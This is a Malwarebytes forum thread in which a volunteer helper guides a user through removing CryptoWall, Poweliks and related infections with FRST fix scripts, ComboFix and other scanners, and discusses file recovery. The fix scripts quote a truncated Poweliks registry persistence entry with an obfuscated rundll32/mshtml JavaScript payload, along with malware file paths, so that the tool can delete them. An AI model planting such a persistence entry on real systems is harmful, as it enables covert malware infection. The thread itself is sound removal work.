Jump to content

Windows Geniune Advantage, Crytpowall, Poweliks, and fff5ee all at once


CJN853
 Share

Recommended Posts

Cleaned up WGA and Cryptowall Monday evening with Malwarebytes and determined that the damage started Sunday morning.  Thought I was clean but still seeing symptoms of Poweliks, fff533, and f0ff0, so also ran root beta, adwcleaner, and MS Malware Removal.  Uninstalled java8 so that the IE temp files would stop flooding %temp%.  Still seeing IE security settings changing and Trend is still blocking fff5ee, f0ff0, and fa8072, so I know I am not done yet!

 

FRST64 output attached.  Please help if you think this might be salvageable.  I want to be sure I am clean before I start picking through what might be saved from Sunday night's backup, as Cryptowall hadn't yet struck 100% of my files.

 

Thanks in advance!

Addition.txt

FRST.txt

Link to post
Share on other sites

Hello CJN853, welcome to Malwarebytes' Malware Removal forum!
 
My username is LiquidTension, but you can call me Adam. I will be assisting you with your malware-related problems.
If you would allow me to call you by your first name I would prefer that. :)
 
General P2P/Piracy Notice: 
 

If you are using Peer to Peer (P2P) filesharing software such as uTorrent, BitTorrent or similar you must either fully uninstall or completely disable the programme(s) from running whilst receiving assistance at this forum. 
Failure to remove or disable such software will result in your topic being closed and no further assistance being provided.
If you have illegal/cracked/keygen or similar software on the computer, please remove/uninstall the software now and read the policy on Piracy. Failure to do so will also result in your topic being closed.

 
======================================================
 
Please read through the points below to ensure this process moves as quickly and efficiently as possible.

  • Please ensure you read through my instructions thoroughly, and carry out each step in the order specified.
  • If you are unable to copy/paste your logs directly into your post, please attach the file. 
  • Please do not run any tools or take any steps other than those I provide for you. Independent efforts may make matters worse, and will affect my ability in ascertaining the current situation and providing the best set of instructions for you.
  • Please backup important files before proceeding with my instructions. Malware removal can be unpredictable.
  • If you come across any issues whilst following my instructions, please stop and inform me of the issue in as much detail as possible. Please do not hesitate to ask before proceeding.
  • Topics are locked if no response is made after 4 days. Please inform me if you will require additional time to complete my instructions.
  • Ensure you are following this topic. Click xetYzdbu.png.pagespeed.ic.U7AjmRUewW.png at the top of the page. 
     

======================================================
 

Please help if you think this might be salvageable.

Yes, we can clear up the malware. 
Depending on the variant of CryptoWall, your encrypted files may be recoverable without the need of restoring from a backup. Once the malware has been removed, we can look into this.
 

  • Press the Windows Key xpdKOQKY.png.pagespeed.ic.tmAgS1-k6q.png + r on your keyboard at the same time. Type inetcpl.cpl and click OK.
  • Click Security
  • Click Custom level....
  • Scroll down to Downloads.
  • Under File download, place a checkmark next to Enable.
  • Click OK.
     

STEP 1
xlK5Hdb.png Farbar Recovery Scan Tool (FRST) Script

  • Press the Windows Key pdKOQKY.png + r on your keyboard at the same time. Type Notepad and click OK.
  • Copy the entire contents of the codebox below and paste into the Notepad document.
    startHKU\S-1-5-21-2396288121-3525874122-1808719847-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!Startup: C:\Users\Mom and Dad\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerReg Scheduler V3.exe (Leader Technologies)HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTIONSearchScopes: HKLM - DefaultScope {49606DC7-976D-4030-A74E-9FB5C842FA68} URL =U2 TMAgent; No ImagePathFolder: C:\Users\Mom and Dad\AppData\Local\EmieBrowserModeList2014-11-11 18:07 - 2014-11-11 18:07 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{FAC3652E-2396-4926-ADC1-1B92C7079871}2014-11-11 05:40 - 2014-11-11 05:40 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{9DE7D7DF-F82C-481A-BC8C-9D706E099B3A}2014-11-10 11:04 - 2014-11-10 20:01 - 00000064 _____ () C:\Users\Mom and Dad\AppData\Roaming\svc-cmkf.exe.bat2014-11-10 09:33 - 2014-11-10 09:33 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{46A51C6F-F5D4-4867-BB24-9DCD160F478D}2014-11-09 16:56 - 2014-11-09 16:56 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{E79AF4D6-4DD7-4760-B5F2-14D1FE1F6531}2014-11-09 10:56 - 2014-11-10 10:43 - 00000160 ____H () C:\ProgramData\@system3.att2014-11-09 10:55 - 2014-11-10 20:37 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Roaming\FrameworkUpdate72014-11-09 10:55 - 2014-11-10 11:54 - 00000424 _____ () C:\ProgramData\@system.temp2014-11-09 10:54 - 2014-11-10 20:37 - 00000000 ___HD () C:\4ab75cf2014-11-09 10:54 - 2014-11-10 11:04 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage2014-11-08 11:00 - 2014-11-08 11:00 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{204B6AAF-9BB9-400E-A047-5CC726B3B745}2014-11-07 06:56 - 2014-11-07 06:56 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{7F31197E-F2C9-4AFB-A85E-683455E48736}2014-11-06 11:32 - 2014-11-06 11:32 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{05A0B7F0-4B81-4D51-8CAA-FECFA405F8FC}2014-11-05 22:14 - 2014-11-05 22:14 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{E0A208BD-5D90-4D12-9440-5E7C57B8C45F}2014-11-05 09:56 - 2014-11-05 09:56 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{4FCAB811-DA8D-4A70-8CDC-84E8BCA3DB58}2014-11-04 21:46 - 2014-11-04 21:46 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{B0D244A4-2694-4E25-B05E-A57AD4888EE7}2014-11-04 09:36 - 2014-11-04 09:36 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{B333DCAC-C7C7-4ABD-8E21-8948C8CCFFD8}2014-11-03 10:00 - 2014-11-03 10:00 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{DE9365F6-9775-4ACE-8C4C-C77C3317E678}2014-11-02 12:52 - 2014-11-02 12:52 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{1F5E55AD-0F14-40A6-8271-FA7A83B86084}2014-11-07 21:45 - 2014-11-07 21:45 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{6E2FED2B-1A67-4686-B599-5C2AE5047D5D}2014-11-01 23:03 - 2014-11-01 23:03 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{55CC58EB-DBE5-4866-B697-4CD70363A04B}2014-11-01 08:44 - 2014-11-01 08:44 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{9F0FBC11-96DD-4825-A2E6-D87CD26B2FDE}2014-10-31 07:35 - 2014-10-31 07:35 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{02DDB402-9617-40D7-8BA6-24262E926182}2014-10-30 19:26 - 2014-10-30 19:26 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{40DBE95E-9958-489A-91F7-721859F2CA36}2014-10-30 07:16 - 2014-10-30 07:16 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{F2A78929-CF74-4C2E-A880-866F7168CB69}2014-10-29 11:18 - 2014-10-29 11:18 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{0B8F622B-EE15-42AE-BE6E-74424339C720}2014-10-28 22:51 - 2014-10-28 22:51 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{AD79057D-BCC6-4F41-B9CF-3D78179B71F8}2014-10-28 22:27 - 2014-10-28 22:27 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{31C1C2C6-EC68-4D93-B7F4-93AC8D695F9F}2014-10-28 19:48 - 2014-10-28 19:49 - 00001829 _____ () C:\Users\Mom and Dad\AppData\Roaming\c006d3e12014-10-28 19:48 - 2014-10-28 19:49 - 00000048 _____ () C:\Users\Mom and Dad\AppData\Roaming\c006d3e22014-10-28 19:48 - 2014-10-28 19:48 - 00000944 ____H () C:\ProgramData\@system2.att2014-10-28 19:48 - 2014-10-28 19:48 - 00000448 ____H () C:\Users\Mom and Dad\AppData\Roaming\麽鎒駓覜2014-10-28 07:30 - 2014-10-28 07:30 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{434246B6-A7CA-47C9-AB53-05A8B9A01000}2014-10-27 13:56 - 2014-10-27 13:56 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{25F3A586-4CDE-46CC-B4F4-0E035E5D4606}2014-10-26 20:48 - 2014-10-26 20:48 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{5A144CE8-B7D9-46FF-87C6-56729C7D9CD5}2014-10-26 08:41 - 2014-10-26 08:41 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{DE9EB159-FC16-4323-8D63-EB8804318680}2014-10-25 10:48 - 2014-10-25 10:48 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{F31DCCB5-1D89-4306-8683-9C6053F44DD9}2014-10-24 21:54 - 2014-10-24 21:54 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{C0863BE8-CCC1-49DF-9693-8DBA11977919}2014-10-24 09:06 - 2014-10-24 09:06 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{6223EC97-8E75-4F83-9970-B346E7855782}2014-10-23 10:23 - 2014-10-23 10:23 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{68CC3DC6-A2BB-468A-AC8E-135385101685}2014-10-22 21:34 - 2014-10-22 21:34 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{78B561E0-F39E-4773-92D3-CC310559CB28}2014-10-22 06:33 - 2014-10-22 06:33 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{475760E4-BC31-4881-A757-661575830867}2014-10-21 08:21 - 2014-10-21 08:21 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{7AFF3E34-9F81-4CF1-8BA3-6C19CF3E2ADC}2014-10-20 10:24 - 2014-10-20 10:24 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{3B5B6225-B669-436A-A08A-64D94FB71BB6}2014-10-20 10:05 - 2014-10-20 10:05 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{9194EA7B-F3AB-4323-B32C-C910A5B9162C}2014-10-20 08:01 - 2014-10-20 08:01 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{08C5FA6F-07A4-4D19-912B-C3064ABFCCFA}2014-10-19 12:23 - 2014-10-19 12:23 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{426AE19E-5198-4047-A22A-62361F078927}2014-10-19 00:22 - 2014-10-19 00:22 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{B763FAE8-02F9-40DD-B726-D3DFD9CA7944}2014-10-18 11:02 - 2014-10-18 11:02 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{5EB17C21-1CA5-4C87-A06E-4C80F532D7B6}2014-10-17 19:19 - 2014-10-17 19:19 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{BC428FE6-4D1E-4111-846F-ABE0E2FD06C9}2014-10-17 07:18 - 2014-10-17 07:18 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{256B339C-4233-4C80-A938-23322F3124B4}2014-10-16 09:13 - 2014-10-16 09:13 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{0D7C6D29-8770-48E0-8408-8448943AA2DE}2014-10-15 12:07 - 2014-10-15 12:07 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{C0A2C253-FA5C-437C-9C99-0E7125E265BF}2014-10-15 11:03 - 2014-10-15 11:03 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{5B194868-C8DF-43BA-9115-42D5D50D1A0F}2014-10-14 22:34 - 2014-10-14 22:34 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{6CF0831F-6AE3-4908-A440-CFA2B0491500}2014-10-14 10:34 - 2014-10-14 10:34 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{4D9F816D-245B-4576-A788-AA51A960E6CE}C:\Users\Public\dcmsvcsetup.exeC:\Users\Public\invokesi.exeCustomCLSID: HKU\S-1-5-21-2396288121-3525874122-1808719847-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?CMD: ipconfig /flushdnsCMD: netsh winsock reset allCMD: netsh int ipv4 resetCMD: netsh int ipv6 resetEmptyTemp:end
  • Click FileSave As and type fixlist.txt as the File Name.
  • Important: In the Encoding: drop-down box, select Unicode.
  • Important: The file must be saved in the same location as FRST64.exe.

NOTICE: This script is intended for use on this particular machine. Do not use this script on any other machine; doing so may cause damage to your Operating System.

  • Right-Click FRST64.exe and select AVOiBNU.jpg Run as administrator to run the programme.
  • Click Fix.
  • A log (Fixlog.txt) will open on your desktop. Copy the contents of the log and paste in your next reply.
     

STEP 2
GfiJrQ9.png Malwarebytes Anti-Malware (MBAM)

  • Open Malwarebytes Anti-Malware and click Update Now.
  • Once updated, click the Settings tab, followed by Detection and Protection and tick Scan for rootkits.
  • Click the Scan tab, ensure Threat Scan is checked and click Scan Now.
  • Note: You may see the following message, "Could not load DDA driver". Click Yes, allow your PC to reboot and continue afterwards.
  • If threats are detected, click the Apply Actions button. You will now be prompted to reboot. Click Yes.
  • Upon completion of the scan (or after the reboot), click the History tab.
  • Click Application Logs and double-click the Scan Log.
  • Click Copy to Clipboard and paste the log in your next reply. 
     

STEP 3
9SN2ePL.png ComboFix

  • Note: Please read through these instructions before running ComboFix. 
  • Please download ComboFix and save the file to your Desktop. << Important!
  • Temporarily disable your anti-virus software. For instructions, please refer to the following link.
  • Right-Click ComboFix.exe and select AVOiBNU.jpg Run as administrator to run the programme.
  • Follow the prompts. 
     
  • Allow ComboFix to complete it's removal routine (please refer to Important Notes:).
  • Upon completion, a log (ComboFix.txt) will be created in the root directory (C:\). Copy the contents of the log and paste in your next reply.
  • Re-enable your anti-virus software.
     

Important Notes:

  • Do NOT mouse click ComboFix's window whilst it is running. This may cause the programme to stall.
  • Do NOT use your computer whilst ComboFix is running.
  • Your Desktop/taskbar may disappear whilst ComboFix is running; this is normal.
     
  • If you get the message Illegal operation attempted on registry key that has been marked for deletion please reboot your computer.
  • ComboFix will disconnect your machine from the Internet as soon as it starts.
  • Please do not attempt to re-connect your machine back to the Internet until ComboFix has completely finished.
  • If you are unable to access the Internet after running ComboFix, please reboot your computer. 
     

STEP 4
YARWD1t.png TDSSKiller Scan

  • Please download TDSSKiller and save the file to your Desktop.
  • Right-Click TDSSKiller.exe and select Run as administrator to run the programme.
  • Click Change parameters. Place a checkmark next to:
    • Loaded Modules
    • Detect TDLFS file system
    • Verify file digital signatures
  • Note: If you receive the following message: Extended Monitoring Driver is required, click Reboot now, and continue from here following the reboot.
  • ​Click Start Scan. Do not use the computer during the scan.
  • If objects are found, change the action to skip.
  • Click Continue and close the window.
  • A log will be created and saved to the root directory (usually C:\). Attach the log in your next reply.
     

STEP 5
xlK5Hdb.png Farbar Recovery Scan Tool (FRST) Scan

  • Right-Click FRST64.exe and select Run as administrator to run the programme.
  • Click Yes to the disclaimer.
  • Ensure the Addition.txt box is checked.
  • Click the Scan button and let the programme run.
  • Upon completion, click OK, then OK on the Addition.txt pop up screen.
  • Two logs (FRST.txt & Addition.txt) will now be open on your Desktop. Copy the contents of both logs and paste in your next reply. 
     

======================================================
 
STEP 6
pfNZP4A.png Logs
In your next reply please include the following logs. Please be sure to copy and paste the requested logs, as well as provide information on any questions I may have asked.

  • Fixlog.txt
  • MBAM log
  • ComboFix.txt
  • TDSSKiller log (attached!)
  • FRST.txt
  • Addition.txt
Link to post
Share on other sites

Hi Chris, 
 
Those logs are looking much better. 
 

Sorry, Adam.  I just realized I didn't follow explicitly on what to copy-paste, vs attach.  Unfortunately, IE is not letting me paste as instructed.

No problem. This is an issue with Internet Explorer. 
You're welcome to continue attaching your logs. 
 
The following steps will just about deal with the malware removal process. 
 
STEP 1
b8zkrsY.png Browser Reset
 
Instructions on how to backup your Favourites/Bookmarks and other data can be found below.

Proceed with the reset once done.

STEP 2
BY4dvz9.png AdwCleaner

  • Please download AdwCleaner and save the file to your Desktop.
  • Right-Click AdwCleaner.exe and select AVOiBNU.jpg Run as administrator to run the programme.
  • Follow the prompts. 
  • Click Scan
  • Upon completion, click Report. A log (AdwCleaner[R0].txt) will open. Briefly check the log for anything you know to be legitimate. 
  • Ensure anything you know to be legitimate does not have a checkmark, and click Clean
  • Follow the prompts and allow your computer to reboot
  • After rebooting, a log (AdwCleaner[s0].txt) will open. Copy the contents of the log and paste in your next reply.

-- File and registry key backups are made for anything removed using this tool. Should a legitimate entry be removed (otherwise known as a 'false-positive'), simple steps can be taken to restore the entry. Please do not overly concern yourself with the contents of AdwCleaner[R0].txt.
 

STEP 3
E3feWj5.png Junkware Removal Tool (JRT)

  • Please download Junkware Removal Tool and save the file to your Desktop.
  • Note: If you unchecked any items in AdwCleaner, please backup the associated folders/files before running JRT.
  • Temporarily disable your anti-virus software. For instructions, please refer to the following link.
  • Right-Click JRT.exe and select Run as administrator to run the programme.
  • Follow the prompts and allow the scan to run uninterrupted. 
  • Upon completion, a log (JRT.txt) will open on your desktop.
  • Re-enable your anti-virus software.
  • Copy the contents of JRT.txt and paste in your next reply.
     

STEP 4
GzlsbnV.png ESET Online Scan
Note: This scan may take a long time to complete. Please do not browse the Internet whilst your Anti-Virus is disabled.

  • Please download ESET Online Scan and save the file to your Desktop.
  • Temporarily disable your anti-virus software. For instructions, please refer to the following link.
  • Double-click esetsmartinstaller_enu.exe to run the programme. 
  • Agree to the EULA by placing a checkmark next to Yes, I accept the Terms of Use. Then click Start.
  • Agree to the Terms of Use once more and click Start. Allow components to download.
  • Place a checkmark next to Enable detection of potentially unwanted applications.
  • Click Hide advanced settings. Place a checkmark next to:
    • Scan archives
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth technology
  • Ensure Remove found threats is unchecked.
  • Click Start.
  • Wait for the scan to finish. Please be patient as this can take some time.
  • Upon completion, click esetListThreats.png. If no threats were found, skip the next two bullet points. 
  • Click esetExport.png and save the file to your Desktop, naming it something such as "MyEsetScan".
  • Push the Back button.
  • Place a checkmark next to xKN1w2nv.png.pagespeed.ic.JWqIaEgZi7.png and click Finish.
  • Re-enable your anti-virus software.
  • Attach the log in your next reply. 
     

======================================================

STEP 5
pfNZP4A.png Logs
In your next reply please include the following logs. Please be sure to copy and paste the requested logs, as well as provide information on any questions I may have asked.

  • Did IE reset OK?
  • AdwCleaner[s0].txt
  • JRT.txt
  • ESET log (attached!)
Link to post
Share on other sites

Hi Chris, 
 
That ESET log is not what I was expecting. 
I was expecting to see detections for ransom notes left behind by CryptoWall. Can you still see ransom notes left by the infection? 
What are the names of the files? 
 
Excluding your encrypted files, are there any outstanding issues with the machine?

xlK5Hdb.png Farbar Recovery Scan Tool (FRST) Script

  • Press the Windows Key pdKOQKY.png + r on your keyboard at the same time. Type Notepad and click OK.
  • Copy the entire contents of the codebox below and paste into the Notepad document.
    startHKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTIONHKU\S-1-5-21-2396288121-3525874122-1808719847-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTIONC:\Users\Mom and Dad\AppData\Local\Temp\{C41981D2-DCE3-4C34-A807-FB699757F778}.exeHKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\31681020.sys => ""="Driver"HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\31681020.sys => ""="Driver"C:\Users\Mom and Dad\Downloads\cbsidlm-cbsi213-ShadowExplorer-SEO-75857753.exeC:\Users\Mom and Dad\Downloads\FeedingFrenzy_Setup-dm.exeEmptyTemp:end
  • Click FileSave As and type fixlist.txt as the File Name
  • Important: The file must be saved in the same location as FRST64.exe. 

NOTICE: This script is intended for use on this particular machine. Do not use this script on any other machine; doing so may cause damage to your Operating System.

  • Right-Click FRST64.exe and select AVOiBNU.jpg Run as administrator to run the programme.
  • Click Fix.
  • A log (Fixlog.txt) will open on your desktop. Copy the contents of the log and paste in your next reply.
Link to post
Share on other sites

Adam:

 

The reason you are not seeing the DECRYPT_INSTRUCTION files (three per attacked directory) is that I had removed them already earlier in the week when I thought I was clean the first time.  I did save the log out of the registry listing all the files that were touched by Cryptowall, though.

 

Interesting that on this last FRST, Trend Max Security detected the activity when I hit 'fix', blocked the action, and removed the exe.  I unblocked the program and restored the exe to the desktop in order to run.  Fixlog is attached...

 

As far as outstanding issues, I do not see %temp% filling up, nor the multiple dllhost *32 processes.  But...  I have not reinstalled Java8 yet (not going to do that until you tell me we are totally finished).  I am a little surprised at how much stuff LOCAL SERVICE and SYSTEM are running, using almost 1/4 of 8Gb physical memory.  I didn't think/realize I had that many services loading automatically.

 

So what do you think next?  You have been a huge help so far.

 

Thanks,

 

Chris

 

 

Fixlog.txt

Link to post
Share on other sites

Was INSTALL_TOR.html one of the ransom files?

If you were infected with the first variant of CryptoWall (rather than the second), you may be able to restore your files using shadow volume copies.

Updating vulnerable software is on the list of things to do. As for Java - unless you have a specific purpose for the programme, I'd stay well clear.

Link to post
Share on other sites

I don't recall seeing that one.  There were three, all with DECRYPT_INSTRUCTION as the root of the file name.  Would INSTALL_TOR.html have been in every directory?  Or a one-time occurrence?

 

Thanks for the tip on Java...  When we are done here, I will remove from my laptop as well (I think we'll scub that one in another post next!)

 

So....  what next?

Link to post
Share on other sites

Hi Chris, 
 
INSTALL_TOR would have been in every folder with an encrypted file. The presence of this file would indicate a CryptoWall 2.0 infection - meaning recovery of your files would not be possible. 
 
-------------------------
 
Here's some information on Java. 
 
Using zANS9oB.png Java is an unnecessary security risk; especially using older versions which have vulnerabilities that malicious sites can use to exploit and infect your system.

Java is one of those technologies that you find installed on the majority of computer systems despite the fact that average users do not come across many Java-powered websites or desktop applications [...] According to W3Techs, only four percent of websites use Java on the server side [...] it is used by 0.2 percent of all websites on the client side. And two tenths of a percent includes sites that do not use it for their core functionality [...] there are sites and applications that require Java, and if you use any of them, you obviously need Java. But that makes you a minority. The majority of Internet users do not need Java. They do not need the Java plugin, nor do they need the Java Runtime Environment installed on their operating system.

-------------------------
 
Regarding your encrypted files - the following may work. 
 
Please locate an encrypted file, and let me know if the following works. 
To restore individual files you can right-click on the file, go into Properties, and select the Previous Versions tab. This tab will list all copies of the file that have been stored in a Shadow Volume Copy and the date they were backed up as shown in the image below.
 

previous-versions.jpg

 
To restore a particular version of the file, simply click on the Copy button and then select the directory you wish to restore the file to. If you wish to restore the selected file and replace the existing one, click on the Restore button. If you wish to view the contents of the actual file, you can click on theOpen button to see the contents of the file before you restore it.
This same method can be used to restore an entire folder. Simply right-click on the folder and select Properties and then the Previous Versions tabs. You will then be presented with a similar screen as above where you can either Copy the selected backup of the folder to a new location or Restore it over the existing folder.

 
-------------------------
 
We need to update your vulnerable software to reduce the risk of reinfection. 
 
STEP 1
CXrghb6.png Update Outdated Software

Outdated software contain security risks that must be patched. Please download and install the latest version of the programmes below.

STEP 2
EtQetiM.png Remove Outdated Software

  • Press the Windows Key pdKOQKY.png + r on your keyboard at the same time. Type appwiz.cpl and click OK.
  • Search for the following programmes, right-click and click Uninstall one at a time.
  • Note: The programmes below may not be present. If this is the case, please skip to the next step.
    • Adobe Reader X (10.1.12) MUI 
  • Follow the prompts, and reboot if necessary.
     

STEP 3
oxliOQk.png Security Check

  • Please download SecurityCheck and save the file to your Desktop.
  • Double-click SecurityCheck.exe and follow the onscreen instructions inside the black box.
  • A log (checkup.txt) will automatically open on your Desktop.
  • Copy the contents of the log and paste in your next reply.
     

======================================================
 
STEP 4
pfNZP4A.png Logs
In your next reply please include the following logs. Please be sure to copy and paste the requested logs, as well as provide information on any questions I may have asked.

  • Update on encrypted files
  • checkup.txt
  • How is your computer performing? Are there any outstanding issues?
Link to post
Share on other sites

Hey, Adam.  Sorry for the delay in responding, but the forum was down last night.

 

I never saw an INSTALL_TOR file in any of the directories, but restore points had been disabled and cleared, so my last windows recovery and Previous Versions are 12-Nov when I turned it back on and got it to stay on.  Similar story browsing with Shadow Explorer.  I fear that when I was mucking around last Mon/Tues/Wed trying to clean on my own I ran a disk cleanup... so while the malware did the disabling, I did the clear in a misguided attempt to disinfect.

 

Any hope beyond piecing together unencrypted portions of my backup?  I am starting to wonder if I need to start over with the factory image, if enough data files related to installed software got damaged.  But I won't give up until you tell me, "give up".  I do have the export from the registry of what files it encrypted so I at least have a handle on what exactly got hit.

 

No problem with the Adobe uninstall / reinstall.  Air did not ask about auto updates, but I have the other two set up update automatically.  Windows is up to date.  Interesting thing was that last Monday when I was disinfecting the first time (unsuccessfully), I saw that there were failed updates going back to mid-Oct.  So something or things had been opening holes for some time, I just didn't recognize the signs for what they were (like the increased in blocked Web Threats in Trend starting about the same time period).

 

Security check log is attached.  There is still a java warning even though that is no longer installed on the machine.

 

Computer is basically performing OK.  A lot more disk activity that I think is normal.  svchost.exe is using about double the memory I would expect (217,140k).  Also, Trend is no longer starting automatically, but I am thinking to uninstall / reinstall per their recommendation when this happens.  I'll wait until you say "OK" before doing so though.

 

Again, thanks.

 

Chris

 

checkup.txt

Link to post
Share on other sites

Hi Chris, 
 

Any hope beyond piecing together unencrypted portions of my backup?  I am starting to wonder if I need to start over with the factory image, if enough data files related to installed software got damaged.  But I won't give up until you tell me, "give up".

Please upload an encrypted file to my channel for analysis.
 

Interesting thing was that last Monday when I was disinfecting the first time (unsuccessfully), I saw that there were failed updates going back to mid-Oct. 

Are all Updates now successfully installed?
 

Security check log is attached.  There is still a java warning even though that is no longer installed on the machine.

That's fine.
 

A lot more disk activity that I think is normal.  svchost.exe is using about double the memory I would expect (217,140k).

Is this with no open programmes?
 

Also, Trend is no longer starting automatically, but I am thinking to uninstall / reinstall per their recommendation when this happens.  I'll wait until you say "OK" before doing so though.

Yes, I would go ahead and reinstall. 
Please download the setup file before uninstalling. Then disconnect from the Internet, open the setup file, and install the programme. Once installed, connect to the Internet, ensure the programme is fully up-to-date, and run a scan.

Link to post
Share on other sites

Adam:

 

File is uploaded...  Word document containing lyrics to the Chicago Bears fight song.

 

Yes, all updates are successfully installed.  In fact, Windows autoupdated and restarted on a security update dated today.

 

Good news on the security check?  Awesome...  Thanks for your help getting to this point!

 

Yes, no open programs.  Disk usage is normal at the moment and svchost is using about 193k.

 

I'll let you know if I have any issues with Trend.

 

Thanks,

 

Chris

 

 

Link to post
Share on other sites

Hi Chris, 
 
Please run this programme for me. 
 
IDToolbyNathan.png IDTool

  • Please download IDTool and save the file to your Desktop.
  • Right-Click idtool.zip and click Extract All. Select your Desktop and click Extract.
  • Right-Click IDTool.exe and click AVOiBNU.jpg Run as administrator to run the programme. 
  • If you're prompted to download and install Micorsoft .NET Framework, please agree. 
  • Allow the programme to collect the necessary data. 
  • Once the main console is loaded, click Rescan Computer and Generate a New Report.
  • Upon completion, and when prompted that the rescan is complete, click Generate Text Friendly Report for Forums.
  • Copy the contents of the report and paste in your next reply.
Link to post
Share on other sites

Adam:

 

No issues with the Trend uninstall/install.  Updated OK, didn't detect anything on a full system scan, and fires up automatically on reboot.  It seems to run a little lighter now.  So while there is a lot of disk activity for about 5-10 minutes on startup, once that stops the computer is quite responsive.  Possibly lousy page file settings or still too many useless services starting?

 

ID tool results below:

 

Infection Detection Tool v1.6 - Nathan Scott
--------------------------------------------
Date/Time: 11/20/2014 10:03:02 PM
Operating System: Windows 7
Service Pack: Service Pack 1
Version Number: 6.1
Product Type: Workstation
--------------------------------------------
[Detected Flags]
 

Link to post
Share on other sites

Hi Chris, 

 

Whilst I look into your encrypted file, we can address your high startup disc activity. 
Please do the following, and let me know if you notice a difference. 

 

F0hoanr.png Clean Boot

  • Press the Windows Key pdKOQKY.png + r on your keyboard at the same time. Type msconfig and click OK.
  • If prompted for an administrator password or for confirmation, type the password, or provide confirmation.
  • In the General tab, click Selective Startup.
  • Remove the checkmark next to Load startup items.
  • Click the Services tab.
  • Place a checkmark next to Hide all Microsoft services.
  • Click Disable all, followed by OK.
  • When prompted, click Restart and boot normally into Windows.
  • Check your computer startup performance.
Link to post
Share on other sites

OK...  So for documentation purposes, this is what got disabled:

 

Services

Adobe acrobat updater

Adobe flash updater

Trend micro solution platform

Seagate service

Shadow explorer service

 

Startup

THXAudio

Creative Updreg

Seagate freeagent

Adobe reader and acrobat manager

MFManager

 

Aren't some of those worthwhile, like the auto updaters, antivirus, and Seagate backup?

Link to post
Share on other sites

OK, so after the login screen, there is still about 10 minutes of disk activity.  Trend seems to have turned its service back on, but I am still thinking I need Seagate and the two Adobes on as well.  Boot time and performance really don't seem all that different, although srvhost went from 214,100k before changing the startup settings, now to 167,100k.

Link to post
Share on other sites

Guest
This topic is now closed to further replies.
 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.